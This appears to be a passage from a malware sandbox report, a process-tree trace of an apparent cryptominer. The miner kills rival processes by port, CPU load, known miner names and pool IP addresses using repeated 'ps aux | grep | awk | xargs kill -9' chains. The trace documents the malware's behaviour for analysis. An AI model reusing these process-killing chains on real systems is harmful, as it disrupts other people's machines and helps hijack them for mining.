  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1807
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1806
- /bin/grep
  grep :2222
  2⤵
  PID:1805
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1815
- /bin/grep
  grep -v -
  2⤵
  PID:1814
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1812
- /bin/grep
  grep :3333
  2⤵
  PID:1811
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1813
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1821
- /bin/grep
  grep -v -
  2⤵
  PID:1820
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1819
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1818
- /bin/grep
  grep :3389
  2⤵
  PID:1817
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1827
- /bin/grep
  grep -v -
  2⤵
  PID:1826
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1825
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1824
- /bin/grep
  grep :4444
  2⤵
  PID:1823
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1833
- /bin/grep
  grep -v -
  2⤵
  PID:1832
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1831
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1830
- /bin/grep
  grep :5555
  2⤵
  PID:1829
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1839
- /bin/grep
  grep -v -
  2⤵
  PID:1838
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1837
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1836
- /bin/grep
  grep :6666
  2⤵
  PID:1835
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1845
- /bin/grep
  grep -v -
  2⤵
  PID:1844
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1843
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1842
- /bin/grep
  grep :6665
  2⤵
  PID:1841
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1851
- /bin/grep
  grep -v -
  2⤵
  PID:1850
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1849
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1848
- /bin/grep
  grep :6667
  2⤵
  PID:1847
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1857
- /bin/grep
  grep -v -
  2⤵
  PID:1856
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1855
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1854
- /bin/grep
  grep :7777
  2⤵
  PID:1853
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1863
- /bin/grep
  grep -v -
  2⤵
  PID:1862
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1861
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1860
- /bin/grep
  grep :8444
  2⤵
  PID:1859
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1869
- /bin/grep
  grep -v -
  2⤵
  PID:1868
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1867
- /bin/grep
  grep :3347
  2⤵
  PID:1865
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1866
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1875
- /bin/grep
  grep -v -
  2⤵
  PID:1874
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1873
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1872
- /bin/grep
  grep :14444
  2⤵
  PID:1871
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1881
- /bin/grep
  grep -v -
  2⤵
  PID:1880
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1879
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1878
- /bin/grep
  grep :14433
  2⤵
  PID:1877
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1887
- /bin/grep
  grep -v -
  2⤵
  PID:1886
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1885
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1884
- /bin/grep
  grep :13531
  2⤵
  PID:1883
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1892
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1891
- /bin/grep
  grep -v grep
  2⤵
  PID:1890
- /bin/grep
  grep "sleep 60"
  2⤵
  PID:1889
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1888
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1897
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1896
- /bin/grep
  grep -v grep
  2⤵
  PID:1895
- /bin/grep
  grep ./crun
  2⤵
  PID:1894
- /bin/ps
  ps aux
  2⤵
  PID:1893
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1902
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:1901
- /bin/grep
  grep -v grep
  2⤵
  PID:1900
- /bin/grep
  grep -vw kdevtmpfsi
  2⤵
  PID:1899
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1898
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1907
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1906
- /bin/grep
  grep :3333
  2⤵
  PID:1905
- /bin/grep
  grep -v grep
  2⤵
  PID:1904
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1903
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1918
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1917
- /bin/grep
  grep :5555
  2⤵
  PID:1916
- /bin/grep
  grep -v grep
  2⤵
  PID:1915
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1914
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1924
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1923
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1922
- /bin/grep
  grep -v grep
  2⤵
  PID:1921
- /bin/ps
  ps aux
  2⤵
  PID:1920
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1929
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1928
- /bin/grep
  grep log_
  2⤵
  PID:1927
- /bin/grep
  grep -v grep
  2⤵
  PID:1926
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1925
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1934
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1933
- /bin/grep
  grep systemten
  2⤵
  PID:1932
- /bin/grep
  grep -v grep
  2⤵
  PID:1931
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1930
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1939
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:1940
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:1940
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:1940
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:1940
- - /sbin/kill
    kill -9 14
    3⤵
    PID:1940
- - /bin/kill
    kill -9 14
    3⤵
    PID:1940
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1938
- /bin/grep
  grep netns
  2⤵
  PID:1937
- /bin/grep
  grep -v grep
  2⤵
  PID:1936
- /bin/ps
  ps aux
  2⤵
  PID:1935
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1945
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1944
- /bin/grep
  grep voltuned
  2⤵
  PID:1943
- /bin/grep
  grep -v grep
  2⤵
  PID:1942
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1941
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1950
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1949
- /bin/grep
  grep darwin
  2⤵
  PID:1948
- /bin/grep
  grep -v grep
  2⤵
  PID:1947
- /bin/ps
  ps aux
  2⤵
  PID:1946
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1955
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1954
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1953
- /bin/grep
  grep -v grep
  2⤵
  PID:1952
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1951
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1960
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1959
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1958
- /bin/grep
  grep -v grep
  2⤵
  PID:1957
- /bin/ps
  ps aux
  2⤵
  PID:1956
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1965
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1964
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1963
- /bin/grep
  grep -v grep
  2⤵
  PID:1962
- /bin/ps
  ps aux
  2⤵
  PID:1961
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1970
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1969
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1968
- /bin/grep
  grep -v grep
  2⤵
  PID:1967
- /bin/ps
  ps aux
  2⤵
  PID:1966
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1975
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1974
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1973
- /bin/grep
  grep -v grep
  2⤵
  PID:1972
- /bin/ps
  ps aux
  2⤵
  PID:1971
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1980
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1979
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1978
- /bin/grep
  grep -v grep
  2⤵
  PID:1977
- /bin/ps
  ps aux
  2⤵
  PID:1976
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1985
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1984
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1983
- /bin/grep
  grep -v grep
  2⤵
  PID:1982
- /bin/ps
  ps aux
  2⤵
  PID:1981
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1990
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1989
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1988
- /bin/grep
  grep -v grep
  2⤵
  PID:1987
- /bin/ps
  ps aux
  2⤵
  PID:1986
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1995
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1994
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1993
- /bin/grep
  grep -v grep
  2⤵
  PID:1992
- /bin/ps
  ps aux
  2⤵
  PID:1991
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2000
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1999
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1998
- /bin/grep
  grep -v grep
  2⤵
  PID:1997
- /bin/ps
  ps aux
  2⤵
  PID:1996
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2005
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2004
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:2003
- /bin/grep
  grep -v grep
  2⤵
  PID:2002
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2001
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2010
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2009
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:2008
- /bin/grep
  grep -v grep
  2⤵
  PID:2007
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2006
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2015
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2014
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:2013
- /bin/grep
  grep -v grep
  2⤵
  PID:2012
- /bin/ps
  ps aux
  2⤵
  PID:2011
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2020
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2019
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:2018
- /bin/grep
  grep -v grep
  2⤵
  PID:2017
- /bin/ps
  ps aux
  2⤵
  PID:2016
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2025
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2024
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:2023
- /bin/grep
  grep -v grep
  2⤵
  PID:2022
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2021
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2032
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2031
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:2030
- /bin/grep
  grep -v grep
  2⤵
  PID:2029
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2028
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2045
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2044
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:2043
- /bin/grep
  grep -v grep
  2⤵
  PID:2042
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2041
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2050
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2049
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:2048
- /bin/grep
  grep -v grep
  2⤵
  PID:2047
- /bin/ps
  ps aux
  2⤵
  PID:2046
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2055
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2054
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2053
- /bin/grep
  grep -v grep
  2⤵
  PID:2052
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2051
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2060
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2059
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:2058
- /bin/grep
  grep -v grep
  2⤵
  PID:2057
- /bin/ps
  ps aux
  2⤵
  PID:2056
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2065
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2064
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:2063
- /bin/grep
  grep -v grep
  2⤵
  PID:2062
- /bin/ps
  ps aux
  2⤵
  PID:2061
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2070
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:2068
- /bin/grep
  grep -v grep
  2⤵
  PID:2067
- /bin/ps
  ps aux
  2⤵
  PID:2066
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2069
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2075
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2074
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:2073
- /bin/grep
  grep -v grep
  2⤵
  PID:2072
- /bin/ps
  ps aux
  2⤵
  PID:2071
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2080
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2079
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:2078
- /bin/grep
  grep -v grep
  2⤵
  PID:2077
- /bin/ps
  ps aux
  2⤵
  PID:2076
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2085
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2084
- /bin/grep
  grep -v grep
  2⤵
  PID:2082
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2081
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:2083
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2090
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2089
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:2088
- /bin/grep
  grep -v grep
  2⤵
  PID:2087
- /bin/ps
  ps aux
  2⤵
  PID:2086
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2094
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:2093
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2095
- /bin/grep
  grep -v grep
  2⤵
  PID:2092
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2091
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2100
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2099
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:2098
- /bin/grep
  grep -v grep
  2⤵
  PID:2097
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2096
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2105
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2104
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:2103
- /bin/grep
  grep -v grep
  2⤵
  PID:2102
- /bin/ps
  ps aux
  2⤵
  PID:2101
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2110
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2109
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:2108
- /bin/grep
  grep -v grep
  2⤵
  PID:2107
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2106
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2115
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2114
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:2113
- /bin/grep
  grep -v grep
  2⤵
  PID:2112
- /bin/ps
  ps aux
  2⤵
  PID:2111
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2120
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2119
- /bin/grep
  grep -v grep
  2⤵
  PID:2117
- /bin/ps
  ps aux
  2⤵
  PID:2116
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:2118
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2125
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2124
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:2123
- /bin/grep
  grep -v grep
  2⤵
  PID:2122
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2121
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2130
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2129
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:2128
- /bin/grep
  grep -v grep
  2⤵
  PID:2127
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2126
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2134
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:2133
- /bin/grep
  grep -v grep
  2⤵
  PID:2132
- /bin/ps
  ps aux
  2⤵
  PID:2131
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2139
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2138
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:2137
- /bin/grep
  grep -v grep
  2⤵
  PID:2136
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2135
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2144
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2143
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:2142
- /bin/grep
  grep -v grep
  2⤵
  PID:2141
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2140
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2149
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2148
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:2147
- /bin/grep
  grep -v grep
  2⤵
  PID:2146
- /bin/ps
  ps aux
  2⤵
  PID:2145
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2154
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2153
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:2152
- /bin/grep
  grep -v grep
  2⤵
  PID:2151
- /bin/ps
  ps aux
  2⤵
  PID:2150
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2159
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2158
- /bin/grep
  grep nqscheduler
  2⤵
  PID:2157
- /bin/grep
  grep -v grep
  2⤵
  PID:2156
- /bin/ps
  ps aux
  2⤵
  PID:2155
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2164
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2163
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:2162
- /bin/grep
  grep -v grep
  2⤵
  PID:2161
- /bin/ps
  ps aux
  2⤵
  PID:2160
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2170
- /bin/grep
  grep "]"
  2⤵
  PID:2168
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:2169
- /bin/grep
  grep -v aux
  2⤵
  PID:2167
- /bin/grep
  grep -v grep
  2⤵
  PID:2166
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2165
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2175
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2174
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:2173
- /bin/grep
  grep -v grep
  2⤵
  PID:2172
- /bin/ps
  ps aux
  2⤵
  PID:2171
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2180
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2179
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:2178
- /bin/grep
  grep -v grep
  2⤵
  PID:2177
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2176
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2185
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2184
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:2183
- /bin/grep
  grep -v grep
  2⤵
  PID:2182
- /bin/ps
  ps aux
  2⤵
  PID:2181
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2192
- /bin/grep
  grep -v _
  2⤵
  PID:2190
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:2191
- /bin/grep
  grep -v -
  2⤵
  PID:2189
- /bin/grep
  grep -v /
  2⤵
  PID:2188
- /bin/grep
  grep -v grep
  2⤵
  PID:2187
- /bin/ps
  ps aux
  2⤵
  PID:2186
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2197
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2196
- /bin/grep
  grep "\\[^"
  2⤵
  PID:2195
- /bin/grep
  grep -v grep
  2⤵
  PID:2194
- /bin/ps
  ps aux
  2⤵
  PID:2193
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2202
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2201
- /bin/grep
  grep rsync
  2⤵
  PID:2200
- /bin/grep
  grep -v grep
  2⤵
  PID:2199
- /bin/ps
  ps aux
  2⤵
  PID:2198
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2207
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2206
- /bin/grep
  grep watchd0g
  2⤵
  PID:2205
- /bin/grep
  grep -v grep
  2⤵
  PID:2204
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2203
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2212
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2211
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2210
- /bin/grep
  grep -v grep
  2⤵
  PID:2209
- /bin/ps
  ps aux
  2⤵
  PID:2208
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2210
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2210
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2210
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2210
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2210
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2210
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2217
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2216
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:2215
- /bin/grep
  grep -v grep
  2⤵
  PID:2214
- /bin/ps
  ps aux
  2⤵
  PID:2213
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2222
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2221
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2220
- /bin/grep
  grep -v grep
  2⤵
  PID:2219
- /bin/ps
  ps aux
  2⤵
  PID:2218
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2227
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2226
- /bin/grep
  grep gitee.com
  2⤵
  PID:2225
- /bin/grep
  grep -v grep
  2⤵
  PID:2224
- /bin/ps
  ps aux
  2⤵
  PID:2223
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2232
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2231
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2230
- /bin/grep
  grep -v grep
  2⤵
  PID:2229
- /bin/ps
  ps aux
  2⤵
  PID:2228
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2237
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2236
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:2235
- /bin/grep
  grep -v grep
  2⤵
  PID:2234
- /bin/ps
  ps aux
  2⤵
  PID:2233
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2242
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2241
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:2240
- /bin/grep
  grep -v grep
  2⤵
  PID:2239
- /bin/ps
  ps aux
  2⤵
  PID:2238
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2247
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2246
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:2245
- /bin/grep
  grep -v grep
